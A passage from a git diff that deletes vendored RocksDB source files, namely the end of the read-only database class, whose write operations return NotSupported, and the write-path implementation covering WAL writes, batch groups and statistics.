-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-  using DBImpl::Merge;
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-  using DBImpl::Delete;
-  virtual Status Delete(const WriteOptions& options,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-  using DBImpl::SingleDelete;
-  virtual Status SingleDelete(const WriteOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice& key) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-  virtual Status Write(const WriteOptions& options,
-                       WriteBatch* updates) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-  using DBImpl::CompactRange;
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice* begin, const Slice* end) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-
-  using DBImpl::CompactFiles;
-  virtual Status CompactFiles(
-      const CompactionOptions& compact_options,
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& input_file_names,
-      const int output_level, const int output_path_id = -1) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-
-  virtual Status DisableFileDeletions() override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-
-  virtual Status EnableFileDeletions(bool force) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-  virtual Status GetLiveFiles(std::vector<std::string>&,
-                              uint64_t* manifest_file_size,
-                              bool flush_memtable = true) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-
-  using DBImpl::Flush;
-  virtual Status Flush(const FlushOptions& options,
-                       ColumnFamilyHandle* column_family) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-
-  using DBImpl::SyncWAL;
-  virtual Status SyncWAL() override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-
-  using DB::IngestExternalFile;
-  virtual Status IngestExternalFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& ingestion_options) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-
- private:
-  friend class DB;
-
-  // No copying allowed
-  DBImplReadOnly(const DBImplReadOnly&);
-  void operator=(const DBImplReadOnly&);
-};
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/db_impl_write.cc b/thirdparty/rocksdb/db/db_impl_write.cc
deleted file mode 100644
index 8a11948..0000000
--- a/thirdparty/rocksdb/db/db_impl_write.cc
+++ /dev/null
@@ -1,1263 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/db_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-#include <inttypes.h>
-#include "db/event_helpers.h"
-#include "monitoring/perf_context_imp.h"
-#include "options/options_helper.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-// Convenience methods
-Status DBImpl::Put(const WriteOptions& o, ColumnFamilyHandle* column_family,
-                   const Slice& key, const Slice& val) {
-  return DB::Put(o, column_family, key, val);
-}
-
-Status DBImpl::Merge(const WriteOptions& o, ColumnFamilyHandle* column_family,
-                     const Slice& key, const Slice& val) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  if (!cfh->cfd()->ioptions()->merge_operator) {
-    return Status::NotSupported("Provide a merge_operator when opening DB");
-  } else {
-    return DB::Merge(o, column_family, key, val);
-  }
-}
-
-Status DBImpl::Delete(const WriteOptions& write_options,
-                      ColumnFamilyHandle* column_family, const Slice& key) {
-  return DB::Delete(write_options, column_family, key);
-}
-
-Status DBImpl::SingleDelete(const WriteOptions& write_options,
-                            ColumnFamilyHandle* column_family,
-                            const Slice& key) {
-  return DB::SingleDelete(write_options, column_family, key);
-}
-
-Status DBImpl::Write(const WriteOptions& write_options, WriteBatch* my_batch) {
-  return WriteImpl(write_options, my_batch, nullptr, nullptr);
-}
-
-#ifndef ROCKSDB_LITE
-Status DBImpl::WriteWithCallback(const WriteOptions& write_options,
-                                 WriteBatch* my_batch,
-                                 WriteCallback* callback) {
-  return WriteImpl(write_options, my_batch, callback, nullptr);
-}
-#endif  // ROCKSDB_LITE
-
-Status DBImpl::WriteImpl(const WriteOptions& write_options,
-                         WriteBatch* my_batch, WriteCallback* callback,
-                         uint64_t* log_used, uint64_t log_ref,
-                         bool disable_memtable, uint64_t* seq_used) {
-  if (my_batch == nullptr) {
-    return Status::Corruption("Batch is nullptr!");
-  }
-  if (concurrent_prepare_ && immutable_db_options_.enable_pipelined_write) {
-    return Status::NotSupported(
-        "pipelined_writes is not compatible with concurrent prepares");
-  }
-
-  Status status;
-  if (write_options.low_pri) {
-    status = ThrottleLowPriWritesIfNeeded(write_options, my_batch);
-    if (!status.ok()) {
-      return status;
-    }
-  }
-
-  if (concurrent_prepare_ && disable_memtable) {
-    return WriteImplWALOnly(write_options, my_batch, callback, log_used,
-                            log_ref, seq_used);
-  }
-
-  if (immutable_db_options_.enable_pipelined_write) {
-    return PipelinedWriteImpl(write_options, my_batch, callback, log_used,
-                              log_ref, disable_memtable, seq_used);
-  }
-
-  PERF_TIMER_GUARD(write_pre_and_post_process_time);
-  WriteThread::Writer w(write_options, my_batch, callback, log_ref,
-                        disable_memtable);
-
-  if (!write_options.disableWAL) {
-    RecordTick(stats_, WRITE_WITH_WAL);
-  }
-
-  StopWatch write_sw(env_, immutable_db_options_.statistics.get(), DB_WRITE);
-
-  write_thread_.JoinBatchGroup(&w);
-  if (w.state == WriteThread::STATE_PARALLEL_MEMTABLE_WRITER) {
-    // we are a non-leader in a parallel group
-    PERF_TIMER_GUARD(write_memtable_time);
-
-    if (w.ShouldWriteToMemtable()) {
-      ColumnFamilyMemTablesImpl column_family_memtables(
-          versions_->GetColumnFamilySet());
-      w.status = WriteBatchInternal::InsertInto(
-          &w, w.sequence, &column_family_memtables, &flush_scheduler_,
-          write_options.ignore_missing_column_families, 0 /*log_number*/, this,
-          true /*concurrent_memtable_writes*/);
-    }
-
-    if (write_thread_.CompleteParallelMemTableWriter(&w)) {
-      // we're responsible for exit batch group
-      auto last_sequence = w.write_group->last_sequence;
-      versions_->SetLastSequence(last_sequence);
-      MemTableInsertStatusCheck(w.status);
-      write_thread_.ExitAsBatchGroupFollower(&w);
-    }
-    assert(w.state == WriteThread::STATE_COMPLETED);
-    // STATE_COMPLETED conditional below handles exit
-
-    status = w.FinalStatus();
-  }
-  if (w.state == WriteThread::STATE_COMPLETED) {
-    if (log_used != nullptr) {
-      *log_used = w.log_used;
-    }
-    if (seq_used != nullptr) {
-      *seq_used = w.sequence;
-    }
-    // write is complete and leader has updated sequence
-    return w.FinalStatus();
-  }
-  // else we are the leader of the write batch group
-  assert(w.state == WriteThread::STATE_GROUP_LEADER);
-
-  // Once reaches this point, the current writer "w" will try to do its write
-  // job.  It may also pick up some of the remaining writers in the "writers_"
-  // when it finds suitable, and finish them in the same write batch.
-  // This is how a write job could be done by the other writer.
-  WriteContext write_context;
-  WriteThread::WriteGroup write_group;
-  bool in_parallel_group = false;
-  uint64_t last_sequence = kMaxSequenceNumber;
-  if (!concurrent_prepare_) {
-    last_sequence = versions_->LastSequence();
-  }
-
-  mutex_.Lock();
-
-  bool need_log_sync = !write_options.disableWAL && write_options.sync;
-  bool need_log_dir_sync = need_log_sync && !log_dir_synced_;
-  if (!concurrent_prepare_ || !disable_memtable) {
-    // With concurrent writes we do preprocess only in the write thread that
-    // also does write to memtable to avoid sync issue on shared data structure
-    // with the other thread
-    status = PreprocessWrite(write_options, &need_log_sync, &write_context);
-  }
-  log::Writer* log_writer = logs_.back().writer;
-
-  mutex_.Unlock();
-
-  // Add to log and apply to memtable.  We can release the lock
-  // during this phase since &w is currently responsible for logging
-  // and protects against concurrent loggers and concurrent writes
-  // into memtables
-
-  last_batch_group_size_ =
-      write_thread_.EnterAsBatchGroupLeader(&w, &write_group);
-
-  if (status.ok()) {
-    // Rules for when we can update the memtable concurrently
-    // 1. supported by memtable
-    // 2. Puts are not okay if inplace_update_support
-    // 3. Merges are not okay
-    //
-    // Rules 1..2 are enforced by checking the options
-    // during startup (CheckConcurrentWritesSupported), so if
-    // options.allow_concurrent_memtable_write is true then they can be
-    // assumed to be true.  Rule 3 is checked for each batch.  We could
-    // relax rules 2 if we could prevent write batches from referring
-    // more than once to a particular key.
-    bool parallel = immutable_db_options_.allow_concurrent_memtable_write &&
-                    write_group.size > 1;
-    int total_count = 0;
-    uint64_t total_byte_size = 0;
-    for (auto* writer : write_group) {
-      if (writer->CheckCallback(this)) {
-        if (writer->ShouldWriteToMemtable()) {
-          total_count += WriteBatchInternal::Count(writer->batch);
-          parallel = parallel && !writer->batch->HasMerge();
-        }
-
-        total_byte_size = WriteBatchInternal::AppendedByteSize(
-            total_byte_size, WriteBatchInternal::ByteSize(writer->batch));
-      }
-    }
-
-    const bool concurrent_update = concurrent_prepare_;
-    // Update stats while we are an exclusive group leader, so we know
-    // that nobody else can be writing to these particular stats.
-    // We're optimistic, updating the stats before we successfully
-    // commit.  That lets us release our leader status early.
-    auto stats = default_cf_internal_stats_;
-    stats->AddDBStats(InternalStats::NUMBER_KEYS_WRITTEN, total_count,
-                      concurrent_update);
-    RecordTick(stats_, NUMBER_KEYS_WRITTEN, total_count);
-    stats->AddDBStats(InternalStats::BYTES_WRITTEN, total_byte_size,
-                      concurrent_update);
-    RecordTick(stats_, BYTES_WRITTEN, total_byte_size);
-    stats->AddDBStats(InternalStats::WRITE_DONE_BY_SELF, 1, concurrent_update);
-    RecordTick(stats_, WRITE_DONE_BY_SELF);
-    auto write_done_by_other = write_group.size - 1;
-    if (write_done_by_other > 0) {
-      stats->AddDBStats(InternalStats::WRITE_DONE_BY_OTHER, write_done_by_other,
-                        concurrent_update);
-      RecordTick(stats_, WRITE_DONE_BY_OTHER, write_done_by_other);
-    }
-    MeasureTime(stats_, BYTES_PER_WRITE, total_byte_size);
-
-    if (write_options.disableWAL) {
-      has_unpersisted_data_.store(true, std::memory_order_relaxed);
-    }
-
-    PERF_TIMER_STOP(write_pre_and_post_process_time);
-
-    if (!concurrent_prepare_) {
-      if (status.ok() && !write_options.disableWAL) {
-        PERF_TIMER_GUARD(write_wal_time);
-        status = WriteToWAL(write_group, log_writer, log_used, need_log_sync,
-                            need_log_dir_sync, last_sequence + 1);
-      }
-    } else {
-      if (status.ok() && !write_options.disableWAL) {
-        PERF_TIMER_GUARD(write_wal_time);
-        // LastToBeWrittenSequence is increased inside WriteToWAL under
-        // wal_write_mutex_ to ensure ordered events in WAL
-        status = ConcurrentWriteToWAL(write_group, log_used, &last_sequence,
-                                      total_count);
-      } else {
-        // Otherwise we inc seq number for memtable writes
-        last_sequence = versions_->FetchAddLastToBeWrittenSequence(total_count);
-      }
-    }
-    assert(last_sequence != kMaxSequenceNumber);
-    const SequenceNumber current_sequence = last_sequence + 1;
-    last_sequence += total_count;
-
-    if (status.ok()) {
-      PERF_TIMER_GUARD(write_memtable_time);
-
-      if (!parallel) {
-        w.status = WriteBatchInternal::InsertInto(
-            write_group, current_sequence, column_family_memtables_.get(),
-            &flush_scheduler_, write_options.ignore_missing_column_families,
-            0 /*recovery_log_number*/, this);
-      } else {
-        SequenceNumber next_sequence = current_sequence;
-        for (auto* writer : write_group) {
-          if (writer->ShouldWriteToMemtable()) {
-            writer->sequence = next_sequence;
-            next_sequence += WriteBatchInternal::Count(writer->batch);
-          }
-        }
-        write_group.last_sequence = last_sequence;
-        write_group.running.store(static_cast<uint32_t>(write_group.size),
-                                  std::memory_order_relaxed);
-        write_thread_.LaunchParallelMemTableWriters(&write_group);
-        in_parallel_group = true;
-
-        // Each parallel follower is doing each own writes. The leader should
-        // also do its own.
-        if (w.ShouldWriteToMemtable()) {
-          ColumnFamilyMemTablesImpl column_family_memtables(
-              versions_->GetColumnFamilySet());
-          assert(w.sequence == current_sequence);
-          w.status = WriteBatchInternal::InsertInto(
-              &w, w.sequence, &column_family_memtables, &flush_scheduler_,
-              write_options.ignore_missing_column_families, 0 /*log_number*/,
-              this, true /*concurrent_memtable_writes*/);
-        }
-        if (seq_used != nullptr) {
-          *seq_used = w.sequence;
-        }
-      }
-    }
-  }
-  PERF_TIMER_START(write_pre_and_post_process_time);
-
-  if (!w.CallbackFailed()) {
-    WriteCallbackStatusCheck(status);
-  }
-
-  if (need_log_sync) {
-    mutex_.Lock();
-    MarkLogsSynced(logfile_number_, need_log_dir_sync, status);
-    mutex_.Unlock();
-    // Requesting sync with concurrent_prepare_ is expected to be very rare. We
-    // hance provide a simple implementation that is not necessarily efficient.
-    if (concurrent_prepare_) {
-      if (manual_wal_flush_) {
-        status = FlushWAL(true);
-      } else {
-        status = SyncWAL();
-      }
-    }
-  }
-
-  bool should_exit_batch_group = true;
-  if (in_parallel_group) {
-    // CompleteParallelWorker returns true if this thread should
-    // handle exit, false means somebody else did
-    should_exit_batch_group = write_thread_.CompleteParallelMemTableWriter(&w);
-  }
-  if (should_exit_batch_group) {
-    if (status.ok()) {
-      versions_->SetLastSequence(last_sequence);
-    }
-    MemTableInsertStatusCheck(w.status);
-    write_thread_.ExitAsBatchGroupLeader(write_group, w.status);
-  }
-
-  if (status.ok()) {
-    status = w.FinalStatus();
-  }
-  return status;
-}
-
-Status DBImpl::PipelinedWriteImpl(const WriteOptions& write_options,
-                                  WriteBatch* my_batch, WriteCallback* callback,
-                                  uint64_t* log_used, uint64_t log_ref,
-                                  bool disable_memtable, uint64_t* seq_used) {
-  PERF_TIMER_GUARD(write_pre_and_post_process_time);
-  StopWatch write_sw(env_, immutable_db_options_.statistics.get(), DB_WRITE);
-
-  WriteContext write_context;
-
-  WriteThread::Writer w(write_options, my_batch, callback, log_ref,
-                        disable_memtable);
-  write_thread_.JoinBatchGroup(&w);
-  if (w.state == WriteThread::STATE_GROUP_LEADER) {
-    WriteThread::WriteGroup wal_write_group;
-    if (w.callback && !w.callback->AllowWriteBatching()) {
-      write_thread_.WaitForMemTableWriters();
-    }
-    mutex_.Lock();
-    bool need_log_sync = !write_options.disableWAL && write_options.sync;
-    bool need_log_dir_sync = need_log_sync && !log_dir_synced_;
-    w.status = PreprocessWrite(write_options, &need_log_sync, &write_context);
-    log::Writer* log_writer = logs_.back().writer;
-    mutex_.Unlock();
-
-    // This can set non-OK status if callback fail.
-    last_batch_group_size_ =
-        write_thread_.EnterAsBatchGroupLeader(&w, &wal_write_group);
-    const SequenceNumber current_sequence =
-        write_thread_.UpdateLastSequence(versions_->LastSequence()) + 1;
-    size_t total_count = 0;
-    size_t total_byte_size = 0;
-
-    if (w.status.ok()) {
-      SequenceNumber next_sequence = current_sequence;
-      for (auto writer : wal_write_group) {
-        if (writer->CheckCallback(this)) {
-          if (writer->ShouldWriteToMemtable()) {
-            writer->sequence = next_sequence;
-            size_t count = WriteBatchInternal::Count(writer->batch);
-            next_sequence += count;
-            total_count += count;
-          }
-          total_byte_size = WriteBatchInternal::AppendedByteSize(
-              total_byte_size, WriteBatchInternal::ByteSize(writer->batch));
-        }
-      }
-      if (w.disable_wal) {
-        has_unpersisted_data_.store(true, std::memory_order_relaxed);
-      }
-      write_thread_.UpdateLastSequence(current_sequence + total_count - 1);
-    }
-
-    auto stats = default_cf_internal_stats_;
-    stats->AddDBStats(InternalStats::NUMBER_KEYS_WRITTEN, total_count);
-    RecordTick(stats_, NUMBER_KEYS_WRITTEN, total_count);
-    stats->AddDBStats(InternalStats::BYTES_WRITTEN, total_byte_size);
-    RecordTick(stats_, BYTES_WRITTEN, total_byte_size);
-
-    PERF_TIMER_STOP(write_pre_and_post_process_time);
-
-    if (w.ShouldWriteToWAL()) {
-      PERF_TIMER_GUARD(write_wal_time);
-      stats->AddDBStats(InternalStats::WRITE_DONE_BY_SELF, 1);
-      RecordTick(stats_, WRITE_DONE_BY_SELF, 1);
-      if (wal_write_group.size > 1) {
-        stats->AddDBStats(InternalStats::WRITE_DONE_BY_OTHER,
-                          wal_write_group.size - 1);
-        RecordTick(stats_, WRITE_DONE_BY_OTHER, wal_write_group.size - 1);
-      }
-      w.status = WriteToWAL(wal_write_group, log_writer, log_used,
-                            need_log_sync, need_log_dir_sync, current_sequence);
-    }
-
-    if (!w.CallbackFailed()) {
-      WriteCallbackStatusCheck(w.status);
-    }
-
-    if (need_log_sync) {
-      mutex_.Lock();
-      MarkLogsSynced(logfile_number_, need_log_dir_sync, w.status);
-      mutex_.Unlock();
-    }
-
-    write_thread_.ExitAsBatchGroupLeader(wal_write_group, w.status);
-  }
-
-  WriteThread::WriteGroup memtable_write_group;
-  if (w.state == WriteThread::STATE_MEMTABLE_WRITER_LEADER) {
-    PERF_TIMER_GUARD(write_memtable_time);
-    assert(w.status.ok());
-    write_thread_.EnterAsMemTableWriter(&w, &memtable_write_group);
-    if (memtable_write_group.size > 1 &&
-        immutable_db_options_.allow_concurrent_memtable_write) {
-      write_thread_.LaunchParallelMemTableWriters(&memtable_write_group);
-    } else {
-      memtable_write_group.status = WriteBatchInternal::InsertInto(
-          memtable_write_group, w.sequence, column_family_memtables_.get(),
-          &flush_scheduler_, write_options.ignore_missing_column_families,
-          0 /*log_number*/, this);
-      versions_->SetLastSequence(memtable_write_group.last_sequence);
-      write_thread_.ExitAsMemTableWriter(&w, memtable_write_group);
-    }
-  }
-
-  if (w.state == WriteThread::STATE_PARALLEL_MEMTABLE_WRITER) {
-    assert(w.ShouldWriteToMemtable());
-    ColumnFamilyMemTablesImpl column_family_memtables(
-        versions_->GetColumnFamilySet());
-    w.status = WriteBatchInternal::InsertInto(
-        &w, w.sequence, &column_family_memtables, &flush_scheduler_,
-        write_options.ignore_missing_column_families, 0 /*log_number*/, this,
-        true /*concurrent_memtable_writes*/);
-    if (write_thread_.CompleteParallelMemTableWriter(&w)) {
-      MemTableInsertStatusCheck(w.status);
-      versions_->SetLastSequence(w.write_group->last_sequence);
-      write_thread_.ExitAsMemTableWriter(&w, *w.write_group);
-    }
-  }
-  if (seq_used != nullptr) {
-    *seq_used = w.sequence;
-  }
-
-  assert(w.state == WriteThread::STATE_COMPLETED);
-  return w.FinalStatus();
-}
-
-Status DBImpl::WriteImplWALOnly(const WriteOptions& write_options,
-                                WriteBatch* my_batch, WriteCallback* callback,
-                                uint64_t* log_used, uint64_t log_ref,
-                                uint64_t* seq_used) {
-  Status status;
-  PERF_TIMER_GUARD(write_pre_and_post_process_time);
-  WriteThread::Writer w(write_options, my_batch, callback, log_ref,
-                        true /* disable_memtable */);
-  if (write_options.disableWAL) {
-    return status;
-  }
-  RecordTick(stats_, WRITE_WITH_WAL);
-  StopWatch write_sw(env_, immutable_db_options_.statistics.get(), DB_WRITE);
-
-  nonmem_write_thread_.JoinBatchGroup(&w);
-  assert(w.state != WriteThread::STATE_PARALLEL_MEMTABLE_WRITER);
-  if (w.state == WriteThread::STATE_COMPLETED) {
-    if (log_used != nullptr) {
-      *log_used = w.log_used;
-    }
-    if (seq_used != nullptr) {
-      *seq_used = w.sequence;
-    }
-    return w.FinalStatus();
-  }
-  // else we are the leader of the write batch group
-  assert(w.state == WriteThread::STATE_GROUP_LEADER);
-  WriteContext write_context;
-  WriteThread::WriteGroup write_group;
-  uint64_t last_sequence;
-  nonmem_write_thread_.EnterAsBatchGroupLeader(&w, &write_group);
-  // Note: no need to update last_batch_group_size_ here since the batch writes
-  // to WAL only
-
-  uint64_t total_byte_size = 0;
-  for (auto* writer : write_group) {
-    if (writer->CheckCallback(this)) {
-      total_byte_size = WriteBatchInternal::AppendedByteSize(
-          total_byte_size, WriteBatchInternal::ByteSize(writer->batch));
-    }
-  }
-
-  const bool concurrent_update = true;
-  // Update stats while we are an exclusive group leader, so we know
-  // that nobody else can be writing to these particular stats.
-  // We're optimistic, updating the stats before we successfully
-  // commit.  That lets us release our leader status early.
-  auto stats = default_cf_internal_stats_;
-  stats->AddDBStats(InternalStats::BYTES_WRITTEN, total_byte_size,
-                    concurrent_update);
-  RecordTick(stats_, BYTES_WRITTEN, total_byte_size);
-  stats->AddDBStats(InternalStats::WRITE_DONE_BY_SELF, 1, concurrent_update);
-  RecordTick(stats_, WRITE_DONE_BY_SELF);
-  auto write_done_by_other = write_group.size - 1;
-  if (write_done_by_other > 0) {
-    stats->AddDBStats(InternalStats::WRITE_DONE_BY_OTHER, write_done_by_other,
-                      concurrent_update);
-    RecordTick(stats_, WRITE_DONE_BY_OTHER, write_done_by_other);
-  }
-  MeasureTime(stats_, BYTES_PER_WRITE, total_byte_size);
-
-  PERF_TIMER_STOP(write_pre_and_post_process_time);
-
-  PERF_TIMER_GUARD(write_wal_time);
-  // LastToBeWrittenSequence is increased inside WriteToWAL under
-  // wal_write_mutex_ to ensure ordered events in WAL
-  status = ConcurrentWriteToWAL(write_group, log_used, &last_sequence,
-                                0 /*total_count*/);
-  auto curr_seq = last_sequence + 1;
-  for (auto* writer : write_group) {
-    if (writer->CheckCallback(this)) {
-      writer->sequence = curr_seq;
-      curr_seq += WriteBatchInternal::Count(writer->batch);
-    }
-  }
-  if (status.ok() && write_options.sync) {
-    // Requesting sync with concurrent_prepare_ is expected to be very rare. We
-    // hance provide a simple implementation that is not necessarily efficient.
-    if (manual_wal_flush_) {
-      status = FlushWAL(true);
-    } else {
-      status = SyncWAL();
-    }
-  }
-  PERF_TIMER_START(write_pre_and_post_process_time);
-
-  if (!w.CallbackFailed()) {
-    WriteCallbackStatusCheck(status);
-  }
-  nonmem_write_thread_.ExitAsBatchGroupLeader(write_group, w.status);
-  if (status.ok()) {
-    status = w.FinalStatus();
-  }
-  if (seq_used != nullptr) {
-    *seq_used = w.sequence;
-  }
-  return status;
-}
-
-void DBImpl::WriteCallbackStatusCheck(const Status& status) {
-  // Is setting bg_error_ enough here?  This will at least stop
-  // compaction and fail any further writes.
-  if (immutable_db_options_.paranoid_checks && !status.ok() &&
-      !status.IsBusy() && !status.IsIncomplete()) {
-    mutex_.Lock();
-    if (bg_error_.ok()) {
-      Status new_bg_error = status;
-      // may temporarily unlock and lock the mutex.
-      EventHelpers::NotifyOnBackgroundError(immutable_db_options_.listeners,
-                                            BackgroundErrorReason::kWriteCallback,
-                                            &new_bg_error, &mutex_);
-      if (!new_bg_error.ok()) {
-        bg_error_ = new_bg_error;  // stop compaction & fail any further writes
-      }
-    }
-    mutex_.Unlock();
-  }
-}
-
-void DBImpl::MemTableInsertStatusCheck(const Status& status) {
-  // A non-OK status here indicates that the state implied by the
-  // WAL has diverged from the in-memory state.  This could be
-  // because of a corrupt write_batch (very bad), or because the
-  // client specified an invalid column family and didn't specify
-  // ignore_missing_column_families.
-  if (!status.ok()) {
-    mutex_.Lock();
-    assert(bg_error_.ok());
-    Status new_bg_error = status;
-    // may temporarily unlock and lock the mutex.
-    EventHelpers::NotifyOnBackgroundError(immutable_db_options_.listeners,
-                                          BackgroundErrorReason::kMemTable,
-                                          &new_bg_error, &mutex_);
-    if (!new_bg_error.ok()) {
-      bg_error_ = new_bg_error;  // stop compaction & fail any further writes
-    }
-    mutex_.Unlock();
-  }
-}
-
-Status DBImpl::PreprocessWrite(const WriteOptions& write_options,
-                               bool* need_log_sync,
-                               WriteContext* write_context) {
-  mutex_.AssertHeld();
-  assert(write_context != nullptr && need_log_sync != nullptr);
-  Status status;
-
-  assert(!single_column_family_mode_ ||
-         versions_->GetColumnFamilySet()->NumberOfColumnFamilies() == 1);
-  if (UNLIKELY(status.ok() && !single_column_family_mode_ &&
-               total_log_size_ > GetMaxTotalWalSize())) {
-    status = HandleWALFull(write_context);
-  }
-
-  if (UNLIKELY(status.ok() && write_buffer_manager_->ShouldFlush())) {
-    // Before a new memtable is added in SwitchMemtable(),
-    // write_buffer_manager_->ShouldFlush() will keep returning true. If another
-    // thread is writing to another DB with the same write buffer, they may also
-    // be flushed. We may end up with flushing much more DBs than needed. It's
-    // suboptimal but still correct.
-    status = HandleWriteBufferFull(write_context);
-  }
-
-  if (UNLIKELY(status.ok() && !bg_error_.ok())) {
-    return bg_error_;
-  }
-
-  if (UNLIKELY(status.ok() && !flush_scheduler_.Empty())) {
-    status = ScheduleFlushes(write_context);
-  }
-
-  if (UNLIKELY(status.ok() && (write_controller_.IsStopped() ||
-                               write_controller_.NeedsDelay()))) {
-    PERF_TIMER_GUARD(write_delay_time);
-    // We don't know size of curent batch so that we always use the size
-    // for previous one. It might create a fairness issue that expiration
-    // might happen for smaller writes but larger writes can go through.
-    // Can optimize it if it is an issue.
-    status = DelayWrite(last_batch_group_size_, write_options);
-  }
-
-  if (status.ok() && *need_log_sync) {
-    // Wait until the parallel syncs are finished. Any sync process has to sync
-    // the front log too so it is enough to check the status of front()
-    // We do a while loop since log_sync_cv_ is signalled when any sync is
-    // finished
-    // Note: there does not seem to be a reason to wait for parallel sync at
-    // this early step but it is not important since parallel sync (SyncWAL) and
-    // need_log_sync are usually not used together.
-    while (logs_.front().getting_synced) {
-      log_sync_cv_.Wait();
-    }
-    for (auto& log : logs_) {
-      assert(!log.getting_synced);
-      // This is just to prevent the logs to be synced by a parallel SyncWAL
-      // call. We will do the actual syncing later after we will write to the
-      // WAL.
-      // Note: there does not seem to be a reason to set this early before we
-      // actually write to the WAL
-      log.getting_synced = true;
-    }
-  } else {
-    *need_log_sync = false;
-  }
-
-  return status;
-}
-
-WriteBatch* DBImpl::MergeBatch(const WriteThread::WriteGroup& write_group,
-                               WriteBatch* tmp_batch, size_t* write_with_wal) {
-  assert(write_with_wal != nullptr);
-  assert(tmp_batch != nullptr);
-  WriteBatch* merged_batch = nullptr;
-  *write_with_wal = 0;
-  auto* leader = write_group.leader;
-  if (write_group.size == 1 && leader->ShouldWriteToWAL() &&
-      leader->batch->GetWalTerminationPoint().is_cleared()) {
-    // we simply write the first WriteBatch to WAL if the group only
-    // contains one batch, that batch should be written to the WAL,
-    // and the batch is not wanting to be truncated
-    merged_batch = leader->batch;
-    *write_with_wal = 1;
-  } else {
-    // WAL needs all of the batches flattened into a single batch.
-    // We could avoid copying here with an iov-like AddRecord
-    // interface
-    merged_batch = tmp_batch;
-    for (auto writer : write_group) {
-      if (writer->ShouldWriteToWAL()) {
-        WriteBatchInternal::Append(merged_batch, writer->batch,
-                                   /*WAL_only*/ true);
-        (*write_with_wal)++;
-      }
-    }
-  }
-  return merged_batch;
-}
-
-// When concurrent_prepare_ is disabled, this function is called from the only
-// write thread. Otherwise this must be called holding log_write_mutex_.
-Status DBImpl::WriteToWAL(const WriteBatch& merged_batch,
-                          log::Writer* log_writer, uint64_t* log_used,
-                          uint64_t* log_size) {
-  assert(log_size != nullptr);
-  Slice log_entry = WriteBatchInternal::Contents(&merged_batch);
-  *log_size = log_entry.size();
-  Status status = log_writer->AddRecord(log_entry);
-  if (log_used != nullptr) {
-    *log_used = logfile_number_;
-  }
-  total_log_size_ += log_entry.size();
-  // TODO(myabandeh): it might be unsafe to access alive_log_files_.back() here
-  // since alive_log_files_ might be modified concurrently
-  alive_log_files_.back().AddSize(log_entry.size());
-  log_empty_ = false;
-  return status;
-}
-
-Status DBImpl::WriteToWAL(const WriteThread::WriteGroup& write_group,
-                          log::Writer* log_writer, uint64_t* log_used,
-                          bool need_log_sync, bool need_log_dir_sync,
-                          SequenceNumber sequence) {
-  Status status;
-
-  size_t write_with_wal = 0;
-  WriteBatch* merged_batch =
-      MergeBatch(write_group, &tmp_batch_, &write_with_wal);
-  if (merged_batch == write_group.leader->batch) {
-    write_group.leader->log_used = logfile_number_;
-  } else if (write_with_wal > 1) {
-    for (auto writer : write_group) {
-      writer->log_used = logfile_number_;
-    }
-  }
-
-  WriteBatchInternal::SetSequence(merged_batch, sequence);
-
-  uint64_t log_size;
-  status = WriteToWAL(*merged_batch, log_writer, log_used, &log_size);
-
-  if (status.ok() && need_log_sync) {
-    StopWatch sw(env_, stats_, WAL_FILE_SYNC_MICROS);
-    // It's safe to access logs_ with unlocked mutex_ here because:
-    //  - we've set getting_synced=true for all logs,
-    //    so other threads won't pop from logs_ while we're here,
-    //  - only writer thread can push to logs_, and we're in
-    //    writer thread, so no one will push to logs_,
-    //  - as long as other threads don't modify it, it's safe to read
-    //    from std::deque from multiple threads concurrently.
-    for (auto& log : logs_) {
-      status = log.writer->file()->Sync(immutable_db_options_.use_fsync);
-      if (!status.ok()) {
-        break;
-      }
-    }
-    if (status.ok() && need_log_dir_sync) {
-      // We only sync WAL directory the first time WAL syncing is
-      // requested, so that in case users never turn on WAL sync,
-      // we can avoid the disk I/O in the write code path.
-      status = directories_.GetWalDir()->Fsync();
-    }
-  }
-
-  if (merged_batch == &tmp_batch_) {
-    tmp_batch_.Clear();
-  }
-  if (status.ok()) {
-    auto stats = default_cf_internal_stats_;
-    if (need_log_sync) {
-      stats->AddDBStats(InternalStats::WAL_FILE_SYNCED, 1);
-      RecordTick(stats_, WAL_FILE_SYNCED);
-    }
-    stats->AddDBStats(InternalStats::WAL_FILE_BYTES, log_size);
-    RecordTick(stats_, WAL_FILE_BYTES, log_size);
-    stats->AddDBStats(InternalStats::WRITE_WITH_WAL, write_with_wal);
-    RecordTick(stats_, WRITE_WITH_WAL, write_with_wal);
-  }
-  return status;
-}
-
